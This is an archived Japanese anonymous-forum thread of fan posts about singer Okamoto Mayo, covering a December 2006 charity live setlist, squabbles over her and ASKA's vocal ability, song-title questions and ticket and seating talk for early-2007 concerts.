今年は握手ないのかよー

181 :名無しの歌姫:2006/12/23(土) 18:56:48 ID:DhdmNhy4
チケット発売日あげ

182 :名無しの歌姫:2006/12/23(土) 23:09:00 ID:XnOrDwW+
ポイントグリーンライブ
01.Power of LOVE!
02.Tomorrow
03.ALONE
04.同窓会〜Dear My Friends〜
05.ぬくもり〜足音
06.White Christmas
07.あなただけに贈るLove Song
08.MOON LIGHT BLUES(チャゲアスカバー)

多分あってると思う
違ったら補足よろ


183 :名無しの歌姫:2006/12/24(日) 01:32:06 ID:7dTkIGjk
ムーンライトブルースASKAが下手だった


184 :名無しの歌姫:2006/12/24(日) 08:09:34 ID:maTAV/Ow
ライブあったってのにこの過疎ぶりは何?

185 :名無しの歌姫:2006/12/24(日) 11:46:38 ID:maTAV/Ow
マジでもうファンいないの?

186 :名無しの歌姫:2006/12/25(月) 00:52:10 ID:JWqmh9ev
>>183
貴様は耳鼻科行った方がいい。
アスカの歌唱力と声量は神だぞ。
あそこまで声がでるアーは他にいるか?他のアーじゃ喉を潰すぞ。

真夜さんもかなりの歌唱力だがアスカとは次元が違う。

187 :名無しの歌姫:2006/12/25(月) 01:22:26 ID:vodCgTYR
ASKA具合悪そうだったらしいぞ。


188 :名無しの歌姫:2006/12/25(月) 02:45:37 ID:+fmyLe2j
すげ〜人だった。
今年最後の締めくくりライブとしてはサイコー。
よかった

189 :名無しの歌姫:2006/12/25(月) 16:35:21 ID:K3jmO21N
なんか総理がきてたらしいね

190 :名無しの歌姫:2006/12/25(月) 20:02:40 ID:ggE0Me/3
>>186
あんたも耳鼻科行った方がいいかもよ!

「真夜さんもかなりの歌唱力」???

耳にタコでも飼ってるんじゃないか?

191 :ASKA:2006/12/25(月) 22:21:47 ID:KuZqTgn4
「地球の色は何色か」と問われたら
あなたは「青」
そう答えるだろう

確かに地球は青かった
人が生まれる前から存在する時間の中で
僕たちは今にたどり着いている
褐色に近づいているこの星の現実を
僕たちはもう知らなければならない

海面は上昇し 陸は日々失われつつある
誰もが聞いたことのあるおとぎ話のように
僕たちも語られてしまうのだろうか

CO2排出による地球温暖化
それが引き起こす深刻な問題は
僕たちの想像を遥かに超える速度で答えになろうとしている

何が出来るのだろう

ひとりひとりが 
この問いかけを持たなくてはいけない

何が出来るのだろう

この問いかけを一人ひとりが持つことで
この星はあのときの青を取り戻せるのかもしれない
未来はただ未来の人のためではなく
やがて生まれ来る自分のために語りたい

192 :ASKA:2006/12/25(月) 22:23:14 ID:KuZqTgn4
100人の人がいれば 100の考えがあります
それが未来へと向かう一歩であるなら
すべてはどれも正しい

すべてを受け入れよう
100の考えを持ったひとつになるために

約束を思いだそう
この時代に生まれた 約束を思いだそう
僕達は選ばれて生まれてきました

僕達にしか乗り越える事が出来ない
この時代に生まれた約束を思いだそう

愛する人を守りたいと思う
それはきっと自分のために
愛する人を愛したいだけ 愛せる日まで愛してみる
やがて生まれくる 自分のために

193 :名無しの歌姫:2006/12/25(月) 22:39:45 ID:JWqmh9ev
>>190
という事は真夜さんの歌唱力は低いという事か?ああその通りだ。
真夜さんはアスカファンでもあるから誉めてあげただけってのがわからんのか?貴様には?

実際には岡本真夜の歌唱力なんぞアスカに比べたら比較にならんぞ。下手じゃないが、せいぜいカスチル並だな。

194 :名無しのパペポピ:2006/12/26(火) 00:25:05 ID:0Cfn9n9V
今年もおわっちまったな。
今日の 川嶋あい ちゃんもよかったな。
いいライブだった。
んじゃ

195 :名無しのパペポピ:2006/12/27(水) 21:58:19 ID:NMFM31GY
ここで岡本真夜批判してるASKAファンは、実を言えばアンチASKAなのでみなさん釣られないように。

196 :名無しの歌姫:2006/12/27(水) 23:02:32 ID:aUdZ9FhT
アルバムが出ました、ばっかリ言って、
新しいアルバムの曲ばっかり。
ここはあなたのファンはほとんどいないのだから、
みんなの知ってる曲を歌うべきでは。
知らない曲ばっかり、歌詞もさっぱり聞き取れない。
というのがpoint greenの感想。

197 :名無しの歌姫:2006/12/29(金) 09:28:24 ID:z0RzqhFP
アルバムもなかなか売れていないから しかたがないよ。
最近はショップでも置いてもらえないようで、
ライブでPRするしかないよ。 周囲ではアルバムリリースほとんど知らないも。
がまんして聴いてよ。

198 :名無しの歌姫:2006/12/29(金) 15:29:48 ID:4ibae9qH
岡本真夜=tomorrowみたいな感じで
tomorrowばっか歌わされんのはもう沢山
10年も前の曲に縛られなくていいよ

199 :名無しの歌姫:2006/12/29(金) 18:42:30 ID:MyUkt2nb
前の横浜のライヴで真夜自身がトモロヲばっかりでみんな飽きないの?って言ってたよ。

200 :名無しの歌姫:2006/12/30(土) 11:21:03 ID:uif9Q3Ya
まよ は トモロヲ あまり歌いたくないの。
でもみんなが 歌ってくれっていうから。  ほな ・・

201 :名無しの歌姫:2006/12/30(土) 15:33:32 ID:mKK9PTy4
トモロヲはキー高いもんな

202 :名無しの歌姫:2006/12/30(土) 18:20:37 ID:BzQP1y0+
そう?歌いやすいよ

203 :名無しの歌姫:2006/12/30(土) 20:14:37 ID:PbK4ZWZ5
真夜のラジヲ最終回かよ

204 : 【大吉】 【1197円】 :2007/01/01(月) 00:13:59 ID:RMviDszB
 

205 : 【ぴょん吉】 【528円】 :2007/01/01(月) 00:44:57 ID:eI3zgX40
真夜ちゃんおめでとう

206 : 【だん吉】 【440円】 :2007/01/01(月) 11:51:52 ID:qqaweXet
真夜の今年の運勢

207 : 【中吉】 【1812円】 :2007/01/01(月) 12:19:08 ID:FVHqiUEx
あけ真夜して岡本う

208 :名無しの歌姫:2007/01/02(火) 09:43:27 ID:PjxY1LXa
おめでとう。  まよ。  今ごろ 南フランスの川のほとりか?

209 :名無しの歌姫:2007/01/02(火) 18:46:53 ID:ThedIOYz
南フランスの川って?

210 :名無しの歌姫:2007/01/03(水) 04:18:24 ID:NCKaXtxa
やはり ローヌ河 だろう。
アビニオン・アルル あたり うろついているんだろう。

211 :名無しの歌姫:2007/01/07(日) 00:30:21 ID:NsC9YKka
保守

何回聞いても三十路街道に入る男の声がうざい
ないほうがいい

212 :名無しの歌姫:2007/01/07(日) 01:06:06 ID:zv6D7Zd6
最近のアルバムはpower of LOVEしか聴いてないやw

213 :名無しの歌姫:2007/01/07(日) 01:31:41 ID:bJNJON8L
足音なんて泣かせるじゃないか。
毎日車で聞いてるよ。

214 :名無しの歌姫:2007/01/07(日) 09:53:38 ID:DNX6cYV5
んだ いい曲だ。 どれも

215 :名無しの歌姫:2007/01/08(月) 06:12:43 ID:ALt0C07k
俺二十歳で、初めてこの人知ったのが小3の時だった。
その時tomorrowを聴いたんだけど、曲名わかんなくてそのまんま。
高校になって色々買い始めて、今もまだ聴いてるw
この人の歌は最強だ・・・

216 :名無しの歌姫:2007/01/08(月) 17:14:23 ID:qXJIOIkn
今回のアルバムは岡本真夜らしくないと思うのは僕だけでしょうか?
大ファンですのでアルバムはもちろん買いました。

217 :名無しの歌姫:2007/01/08(月) 23:59:52 ID:gwd7mbQs
33歳のお誕生日おめでとう!!

218 :名無しの歌姫:2007/01/09(火) 00:21:27 ID:8fjQbzWj
ありがとうございました!!

219 :名無しの歌姫:2007/01/09(火) 00:30:05 ID:ZsioTxWP
>>216
そう?
俺は割りと「っぽい」感じがしたけどw

220 :名無しの歌姫:2007/01/09(火) 20:04:16 ID:RHC9l2sK
ぎゃはは また一つ 歳とったな。

新アルバム  現在 迷走中ってとこかな。
またいずれ スタート地点にもどるだろう。

221 :名無しの歌姫:2007/01/12(金) 13:07:16 ID:/FIR2IdJ
保守

足音いいわ

222 :名無しの歌姫:2007/01/13(土) 23:27:53 ID:tEEX3AYd
ぉぅぉぅ、足音、何度聞いてもいい曲だぉ

223 :名無しの歌姫:2007/01/15(月) 18:55:27 ID:Tw5WyNaB
名古屋のライヴチケット欲しいな。誰か売ってくれる人いませんか?

224 :名無しの歌姫:2007/01/15(月) 20:08:16 ID:1uS4niG1
名古屋 売り切れちまったのか?
先行で買っといてよかった。

225 :名無しの歌姫:2007/01/16(火) 16:26:24 ID:i6gIGCmZ
名古屋でもやるの?


226 :名無しの歌姫:2007/01/16(火) 18:37:46 ID:Okn0i+It
名古屋でもやるよ。 とっくの昔に発売になっているが。


227 :名無しの歌姫:2007/01/19(金) 10:09:12 ID:oaBFm5cR
あげ

228 :名無しの歌姫:2007/01/19(金) 15:26:13 ID:uAnhTGPm
このスレの人、みんな岡本真夜を
好きで居続けてきてるんだね。
こういうファンを持った人は幸せだ。
使い捨てのアーティストと違ってね。

229 :名無しの歌姫:2007/01/20(土) 19:00:58 ID:amZBFgcN
真夜ちゃん、めっちゃ好き!!
こういうアーティストに出会えて幸せだ。

230 :名無しの歌姫:2007/01/21(日) 12:15:54 ID:jOZkZ1gK
>>91
禿同

231 :名無しの歌姫:2007/01/22(月) 01:29:55 ID:6MpNhuET
おいら 11年来のファンだい

232 :名無しの歌姫:2007/01/23(火) 08:30:38 ID:ztGw+duP
>>228
一般の人から見たら岡本真夜はシーンに使い捨てされ
エイベックスに拾ってもらって何とか生きてる都落ち歌手だよ?

233 :名無しの歌姫:2007/01/23(火) 21:44:31 ID:H41wEVtL
>>198
なんか、レミオロメン=粉雪みたいだね。

234 :名無しの歌姫:2007/01/25(木) 23:58:56 ID:24UzAoat
age

235 :名無しの歌姫:2007/01/28(日) 22:28:49 ID:DIqAFfhE
定期age

236 :愛知くん:2007/01/29(月) 00:08:02 ID:pMfhB4OC
真夜さん
馬鹿な連中は無視してがんばりましょうね!!

237 :名無しの歌姫:2007/02/01(木) 22:45:44 ID:ASOFdmJn
岡本真夜さんの歌で『 おめでとう〜HAPPY HAPPYbirthday〜♪』みたいな感じのサビの曲名教えてください(´・ω・`)

238 :名無しの歌姫:2007/02/01(木) 23:28:18 ID:ksfPzqKh
>>237
ハピハピバースディ

239 :名無しの歌姫:2007/02/03(土) 09:47:11 ID:q+IwssPy
岡本さんのために埼玉県から金沢に来てしまいますた。
(´・ω・`)

240 :名無しの歌姫:2007/02/04(日) 02:02:12 ID:e/UtSTXM
アゲアゲ
(`・ω・´)
ガンガレ岡本さん

241 :名無しの歌姫:2007/02/05(月) 23:32:52 ID:0phXx3Qw
わしも 遠くから金沢へやってきたのさ〜

242 :名無しの歌姫:2007/02/06(火) 00:07:32 ID:d2k5wLz9
歌詞で“時が経てば忘れるだろう 寂しさも涙も全部…”というものがある曲名ってなんでしょうか?教えて下さいm(__;)m

243 :名無しの歌姫:2007/02/06(火) 01:03:15 ID:cU+iDHjE
>>242
大丈夫だよ

244 :名無しの歌姫:2007/02/06(火) 06:46:53 ID:LdW9MuKF
>>243
ありがとうございました(*´∀`*)

245 :名無しの歌姫:2007/02/06(火) 08:04:25 ID:aoCRw46e
>>241
どこからだ?
(;゚∀゚)=3
どこから北んだ?

246 :名無しの歌姫:2007/02/06(火) 09:32:45 ID:BYtjuH81
歌詞で「ピポピポ神様、助けて下さいな」とある曲のタイトル教えて下さい

247 :名無しの歌姫:2007/02/06(火) 10:27:23 ID:Hha8Lpf9
help me

248 :名無しの歌姫:2007/02/06(火) 11:38:49 ID:J6OkUaDp
歌詞で「食後のデザート アンドロメダ星雲」とある曲のタイトル教えて下さい

249 :名無しの歌姫:2007/02/06(火) 14:41:05 ID:xPnSvCf1
少しくらい自分で調べろよ

250 :名無しの歌姫:2007/02/07(水) 00:28:10 ID:XVrsVDpb
>>248
さらば流星

251 :名無しの歌姫:2007/02/07(水) 06:41:01 ID:QWivsFcG
>>250
おまい良い奴だな…(つω⊂)


252 :名無しの歌姫:2007/02/07(水) 11:21:16 ID:YjdkgBCe
ていうか、間違ってるぞw

253 :名無しの歌姫:2007/02/07(水) 21:56:34 ID:XVrsVDpb
>>251
よく言われる(*^_^*)

254 :名無しの歌姫:2007/02/08(木) 23:53:41 ID:fl2zXboh
チケットまだ届かないよぉ。

255 :名無しの歌姫:2007/02/09(金) 02:59:51 ID:FqCyKEN2
>>254
どの会のチケだ?

256 :名無しの歌姫:2007/02/09(金) 13:52:14 ID:pvFVSVKF
名古屋のチケGet!!

257 :名無しの歌姫:2007/02/09(金) 16:18:32 ID:dYGgQFLP
ケチ まだ届いていないぞ。2週間前なのに

258 :名無しの歌姫:2007/02/09(金) 17:50:30 ID:OJY3wPk9
今日届いたよ
東京

259 :名無しの歌姫:2007/02/09(金) 20:55:21 ID:a7EMADHn
>>255
>>254です。東京分です。
今日仕事から帰ってきたら、「郵便物お預かりのお知らせ」が入ってた。
受け取りは明日以降ですorz

260 :名無しの歌姫:2007/02/09(金) 21:39:12 ID:pCnne550
きたぞ H列か。  遠いな。
だんだん後ろになっていくな。

261 :名無しの歌姫:2007/02/10(土) 00:05:59 ID:h4jqE1t/
俺はE列

262 :名無しの歌姫:2007/02/10(土) 19:34:12 ID:hPdAFzI3
やべっ。東京公演のチケットの封書を開けたら…
最前列取れちまった…

少し興奮気味…

263 :名無しの歌姫:2007/02/10(土) 23:00:17 ID:AocozrjG
最前列は1曲目からアンコールまで立っていること。

264 :名無しの歌姫:2007/02/11(日) 01:07:01 ID:arsyKJ34
>>263
Why?┐(´ー`)┌

265 :名無しの歌姫:2007/02/11(日) 17:41:18 ID:arsyKJ34
定期アゲ

266 :名無しの歌姫:2007/02/11(日) 22:58:25 ID:Y57MYzAd
はあい、前の人座んないでくださあい。

感じ悪いね

267 :254:2007/02/11(日) 23:59:19 ID:oFzp0SXI
>>262
マジっすか?
おいらは4列目…

268 :名無しの歌姫:2007/02/12(月) 23:53:33 ID:ae/pZh5j
どうしたら 前のほうをGETできるんだ。
宝くじで3000−GETするより難しいな。

269 :名無しの歌姫:2007/02/13(火) 01:04:46 ID:TnXguWu4
どうせ前の方もボコボコ穴があるじゃん
移っちゃえばいいよ

270 :名無しの歌姫:2007/02/13(火) 09:51:17 ID:nnmQv6ac
チケぴあだと3階しかなかった。前回もそうだった。見晴らしいいから良いけど。

271 :名無しの歌姫:2007/02/13(火) 20:19:28 ID:35Ux+UrI
ゼップナゴヤの一列は何番までありますか?


272 :名無しの歌姫:2007/02/13(火) 23:05:07 ID:FuiUr5Sz
>>269
  空いていないと思うよ。  前回探したが空いてなかった。
3階だよ転落するぞ。  気をつけろ

273 :名無しの歌姫:2007/02/15(木) 15:07:50 ID:wz4oQsOZ
このスレ平和だなぁ (´Д`)

274 :名無しの歌姫:2007/02/16(金) 17:21:42 ID:B4QE/4Yd
まよちゃん 歌ってるよ。
http://www.iiv.ne.jp/tfm/senri/
途中で待ちがえたけど。


275 :名無しの歌姫:2007/02/18(日) 17:55:09 ID:ac1Xnraf
字が待ちがってる。


276 :名無しの歌姫:2007/02/21(水) 18:55:09 ID:ir8OrBAg
定期age。。

277 :名無しの歌姫:2007/02/21(水) 20:03:20 ID:1bZVnkVx
マチャミの番組でちょっとだけ流れてたね。

278 :名無しの歌姫:2007/02/22(木) 09:22:30 ID:Lzo8BLtE
今日は名古屋か。

279 :名無しの歌姫:2007/02/23(金) 01:50:20 ID:YnRssOE1
真夜ちゃん最高だったよ!!うまいね〜
帰りタクシーの中で手を振ってくれた!!

44 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)